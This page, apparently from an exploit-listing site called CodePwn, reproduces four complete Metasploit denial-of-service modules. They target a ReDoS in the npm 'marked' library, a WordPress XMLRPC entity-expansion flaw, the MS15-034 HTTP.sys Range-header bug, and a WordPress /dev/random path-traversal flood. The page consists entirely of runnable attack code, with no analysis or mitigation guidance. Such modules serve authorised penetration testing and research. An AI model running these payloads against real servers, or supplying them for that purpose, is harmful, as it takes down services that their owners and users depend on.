Latest exploits :: CodePwn

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'marked npm module "heading" ReDoS', 'Description' => %q{ This module exploits a Regular Expression Denial of Service vulnerability in the npm module "marked". The vulnerable portion of code that this module targets is in the "heading" regular expression. Web applications that use "marked" for generating html from markdown are vulnerable. Versions up to 0.4.0 are vulnerable. }, 'References' => [ ['URL', 'https://blog.sonatype.com/cve-2017-17461-vulnerable-or-not'], ['CWE', '400'] ], 'Author' => [ 'Adam Cazzolla, Sonatype Security Research', 'Nick Starke, Sonatype Security Research' ], 'License' => MSF_LICENSE )) register_options([ Opt::RPORT(80), OptString.new('HTTP_METHOD', [true, 'The default HTTP Verb to use', 'GET']), OptString.new('HTTP_PARAMETER', [true, 'The vulnerable HTTP parameters', '']), OptString.new('TARGETURI', [true, 'The URL Path to use', '/']) ]) end def run if test_service trigger_redos test_service_unresponsive else fail_with(Failure::Unreachable, "#{peer} - Could not communicate with service.") end end def trigger_redos begin print_status("Sending ReDoS request to #{peer}.") params = { 'uri' => normalize_uri(target_uri.path), 'method' => datastore['HTTP_METHOD'], ("vars_#{datastore['HTTP_METHOD'].downcase}") => { datastore['HTTP_PARAMETER'] => "# #" + (" " * 20 * 1024) + Rex::Text.rand_text_alpha(1) } } res = send_request_cgi(params) if res fail_with(Failure::Unknown, "ReDoS request unsuccessful. Received status #{res.code} from #{peer}.") end print_status("No response received from #{peer}, service is most likely unresponsive.") rescue ::Rex::ConnectionRefused print_error("Unable to connect to #{peer}.") rescue ::Timeout::Error print_status("No HTTP response received from #{peer}, this indicates the payload was successful.") end end def test_service_unresponsive begin print_status('Testing for service unresponsiveness.') res = send_request_cgi({ 'uri' => '/' + Rex::Text.rand_text_alpha(8), 'method' => 'GET' }) if res.nil? print_good('Service not responding.') else print_error('Service responded with a valid HTTP Response; ReDoS attack failed.') end rescue ::Rex::ConnectionRefused print_error('An unknown error occurred.') rescue ::Timeout::Error print_good('HTTP request timed out, most likely the ReDoS attack was successful.') end end def test_service begin print_status('Testing Service to make sure it is working.') res = send_request_cgi({ 'uri' => '/' + Rex::Text.rand_text_alpha(8), 'method' => 'GET' }) if res && res.code >= 100 && res.code < 500 print_status("Test request successful, attempting to send payload. Server returned #{res.code}") return true else return false end rescue ::Rex::ConnectionRefused print_error("Unable to connect to #{peer}.") return false end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'Wordpress XMLRPC DoS', 'Description' => %q{ Wordpress XMLRPC parsing is vulnerable to a XML based denial of service. This vulnerability affects Wordpress 3.5 - 3.9.2 (3.8.4 and 3.7.4 are also patched). }, 'Author' => [ 'Nir Goldshlager', # advisory 'Christian Mehlmauer' # metasploit module ], 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-5266'], ['URL', 'https://wordpress.org/news/2014/08/wordpress-3-9-2/'], ['URL', 'http://www.breaksec.com/?p=6362'], ['URL', 'https://mashable.com/archive/wordpress-xml-blowup-dos'], ['URL', 'https://core.trac.wordpress.org/changeset/29404'], ['WPVDB', '7526'] ], 'DisclosureDate'=> '2014-08-06' )) register_options( [ OptInt.new('RLIMIT', [ true, "Number of requests to send", 1000 ]) ]) register_advanced_options( [ OptInt.new('FINGERPRINT_STEP', [true, "The stepsize in MB when fingerprinting", 8]), OptInt.new('DEFAULT_LIMIT', [true, "The default limit in MB", 8]) ]) end def rlimit datastore['RLIMIT'] end def default_limit datastore['DEFAULT_LIMIT'] end def fingerprint_step datastore['FINGERPRINT_STEP'] end def fingerprint memory_to_use = fingerprint_step # try out the available memory in steps # apache will return a server error if the limit is reached while memory_to_use < 1024 vprint_status("trying memory limit #{memory_to_use}MB") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, 'data' => generate_xml(memory_to_use), 'ctype' =>'text/xml' } begin # low timeout because the server error is returned immediately res = send_request_cgi(opts, timeout = 3) rescue ::Rex::ConnectionError => exception print_error("unable to connect: '#{exception.message}'") break end if res && res.code == 500 # limit reached, return last limit last_limit = memory_to_use - fingerprint_step vprint_status("got an error - using limit #{last_limit}MB") return last_limit else memory_to_use += fingerprint_step end end # no limit can be determined print_warning("can not determine limit, will use default of #{default_limit}") return default_limit end def generate_xml(size) entity = Rex::Text.rand_text_alpha(3) doctype = Rex::Text.rand_text_alpha(6) param_value_1 = Rex::Text.rand_text_alpha(5) param_value_2 = Rex::Text.rand_text_alpha(5) size_bytes = size * 1024 # Wordpress only resolves one level of entities so we need # to specify one long entity and reference it multiple times xml = '<?xml version="1.0" encoding="iso-8859-1"?>' xml << "<!DOCTYPE %{doctype} [" xml << "<!ENTITY %{entity} \"%{entity_value}\">" xml << ']>' xml << '<methodCall>' xml << '<methodName>' xml << "%{payload}" xml << '</methodName>' xml << '<params>' xml << "<param><value>%{param_value_1}</value></param>" xml << "<param><value>%{param_value_2}</value></param>" xml << '</params>' xml << '</methodCall>' empty_xml = xml % { :doctype => '', :entity => '', :entity_value => '', :payload => '', :param_value_1 => '', :param_value_2 => '' } space_to_fill = size_bytes - empty_xml.size vprint_status("max XML space to fill: #{space_to_fill} bytes") payload = "&#{entity};" * (space_to_fill / 6) entity_value_length = space_to_fill - payload.length payload_xml = xml % { :doctype => doctype, :entity => entity, :entity_value => Rex::Text.rand_text_alpha(entity_value_length), :payload => payload, :param_value_1 => param_value_1, :param_value_2 => param_value_2 } payload_xml end def run # get the max size print_status("trying to fingerprint the maximum memory we could use") size = fingerprint print_status("using #{size}MB as memory limit") # only generate once xml = generate_xml(size) for x in 1..rlimit print_status("sending request ##{x}...") opts = { 'method' => 'POST', 'uri' => wordpress_url_xmlrpc, 'data' => xml, 'ctype' =>'text/xml' } begin c = connect r = c.request_cgi(opts) c.send_request(r) # Don't wait for a response, can take very long rescue ::Rex::ConnectionError => exception print_error("unable to connect: '#{exception.message}'") return ensure disconnect(c) if c end end end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary # Watch out, dos all the things include Msf::Auxiliary::Scanner include Msf::Exploit::Remote::HttpClient include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info(info, 'Name' => 'MS15-034 HTTP Protocol Stack Request Handling Denial-of-Service', 'Description' => %q{ This module will check if scanned hosts are vulnerable to CVE-2015-1635 (MS15-034), a vulnerability in the HTTP protocol stack (HTTP.sys) that could result in arbitrary code execution. This module will try to cause a denial-of-service. }, 'Author' => [ # Bill did all the work (see the pastebin code), twitter: @hectorh56193716 'Bill Finlayson', # MSF. But really, these people made it happen: # https://github.com/rapid7/metasploit-framework/pull/5150 'sinn3r' ], 'References' => [ ['CVE', '2015-1635'], ['MSB', 'MS15-034'], ['URL', 'https://pastebin.com/ypURDPc4'], ['URL', 'https://github.com/rapid7/metasploit-framework/pull/5150'], ['URL', 'https://community.qualys.com/blogs/securitylabs/2015/04/20/ms15-034-analyze-and-remote-detection'], ['URL', 'http://www.securitysift.com/an-analysis-of-ms15-034/'] ], 'License' => MSF_LICENSE )) register_options( [ OptString.new('TARGETURI', [false, 'URI to the site (e.g /site/) or a valid file resource (e.g /welcome.png)', '/']) ]) end def upper_range 0xFFFFFFFFFFFFFFFF end def run_host(ip) if check_host(ip) == Exploit::CheckCode::Vulnerable dos_host(ip) else print_status("Probably not vulnerable, will not dos it.") end end # Needed to allow the vulnerable uri to be shared between the #check and #dos def target_uri @target_uri ||= super end def get_file_size(ip) @file_size ||= lambda { file_size = -1 uri = normalize_uri(target_uri.path) res = send_request_raw('uri' => uri) unless res vprint_error("Connection timed out") return file_size end if res.code == 404 vprint_error("You got a 404. URI must be a valid resource.") return file_size end file_size = res.body.length vprint_status("File length: #{file_size} bytes") return file_size }.call end def dos_host(ip) file_size = get_file_size(ip) lower_range = file_size - 2 # In here we have to use Rex because if we dos it, it causes our module to hang too uri = normalize_uri(target_uri.path) begin cli = Rex::Proto::Http::Client.new(ip) cli.connect req = cli.request_raw( 'uri' => uri, 'method' => 'GET', 'headers' => { 'Range' => "bytes=#{lower_range}-#{upper_range}" } ) cli.send_request(req) rescue ::Errno::EPIPE, ::Timeout::Error # Same exceptions the HttpClient mixin catches end print_status("DOS request sent") end def potential_static_files_uris uri = normalize_uri(target_uri.path) return [uri] unless uri[-1, 1] == '/' uris = ["#{uri}welcome.png"] res = send_request_raw('uri' => uri, 'method' => 'GET') return uris unless res site_uri = URI.parse(full_uri) page = Nokogiri::HTML(res.body.encode('UTF-8', invalid: :replace, undef: :replace)) page.xpath('//link|//script|//style|//img').each do |tag| %w(href src).each do |attribute| attr_value = tag[attribute] next unless attr_value && !attr_value.empty? uri = site_uri.merge(URI::DEFAULT_PARSER.escape(attr_value.strip)) next unless uri.host == vhost || uri.host == rhost uris << uri.path if uri.path =~ /\.[a-z]{2,}$/i # Only keep path with a file end end uris.uniq end def check_host(ip) potential_static_files_uris.each do |potential_uri| uri = normalize_uri(potential_uri) res = send_request_raw( 'uri' => uri, 'method' => 'GET', 'headers' => { 'Range' => "bytes=0-#{upper_range}" } ) vmessage = "#{peer} - Checking #{uri}" if res && res.body.include?('Requested Range Not Satisfiable') vprint_status("#{vmessage} [#{res.code}] - Vulnerable") target_uri.path = uri # Needed for the DoS attack return Exploit::CheckCode::Vulnerable elsif res && res.body.include?('The request has an invalid header name') vprint_status("#{vmessage} [#{res.code}] - Safe") return Exploit::CheckCode::Safe else vprint_status("#{vmessage} - Unknown") end end Exploit::CheckCode::Unknown end end </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Auxiliary include Msf::Exploit::Remote::HTTP::Wordpress include Msf::Auxiliary::Dos def initialize(info = {}) super(update_info( info, 'Name' => 'WordPress Traversal Directory DoS', 'Description' => %q{ Cross-site request forgery (CSRF) vulnerability in the wp_ajax_update_plugin function in wp-admin/includes/ajax-actions.php in WordPress before 4.6 allows remote attackers to hijack the authentication of subscribers for /dev/random read operations by leveraging a late call to the check_ajax_referer function, a related issue to CVE-2016-6896.}, 'License' => MSF_LICENSE, 'Author' => [ 'Yorick Koster', # Vulnerability disclosure 'CryptisStudents' # Metasploit module ], 'References' => [ ['CVE', '2016-6897'], ['EDB', '40288'], ['OVE', 'OVE-20160712-0036'] ], )) register_options( [ OptInt.new('RLIMIT', [true, 'The number of requests to send', 200]), OptInt.new('THREADS', [true, 'The number of concurrent threads', 5]), OptInt.new('TIMEOUT', [true, 'The maximum time in seconds to wait for each request to finish', 5]), OptInt.new('DEPTH', [true, 'The depth of the path', 10]), OptString.new('USERNAME', [true, 'The username to send the requests with', '']), OptString.new('PASSWORD', [true, 'The password to send the requests with', '']) ]) end def rlimit datastore['RLIMIT'] end def username datastore['USERNAME'] end def password datastore['PASSWORD'] end def thread_count datastore['THREADS'] end def timeout datastore['TIMEOUT'] end def depth datastore['DEPTH'] end def user_exists(user) exists = wordpress_user_exists?(user) if exists print_good("Username \"#{user}\" is valid") return true else print_error("\"#{user}\" is not a valid username") return false end end def run if wordpress_and_online? print_status("Checking if user \"#{username}\" exists...") unless user_exists(username) print_error('Aborting operation - a valid username must be specified') return end starting_thread = 1 cookie = wordpress_login(username, password) store_valid_credential(user: username, private: password, proof: cookie) if cookie.nil? print_error('Aborting operation - failed to authenticate') return end path = "/#{'../' * depth}dev/random" while starting_thread < rlimit do ubound = [rlimit - (starting_thread - 1), thread_count].min print_status("Executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}...") threads = [] 1.upto(ubound) do |i| threads << framework.threads.spawn("Module(#{self.refname})-request#{(starting_thread - 1) + i}", false, i) do |i| begin # shell code res = send_request_cgi( opts = { 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin-ajax.php'), 'vars_post' => { 'action' => 'update-plugin', 'plugin' => path }, 'cookie' => cookie }, timeout = 0.2) rescue => e print_error("Timed out during request #{(starting_thread - 1) + i}") end end end threads.each(&:join) print_good("Finished executing requests #{starting_thread} - #{(starting_thread + ubound) - 1}") starting_thread += ubound end if wordpress_and_online? print_error("FAILED: #{target_uri} appears to still be online") else print_good("SUCCESS: #{target_uri} appears to be down") end else print_error("#{rhost}:#{rport}#{target_uri} does not appear to be running WordPress") end end end </code></pre>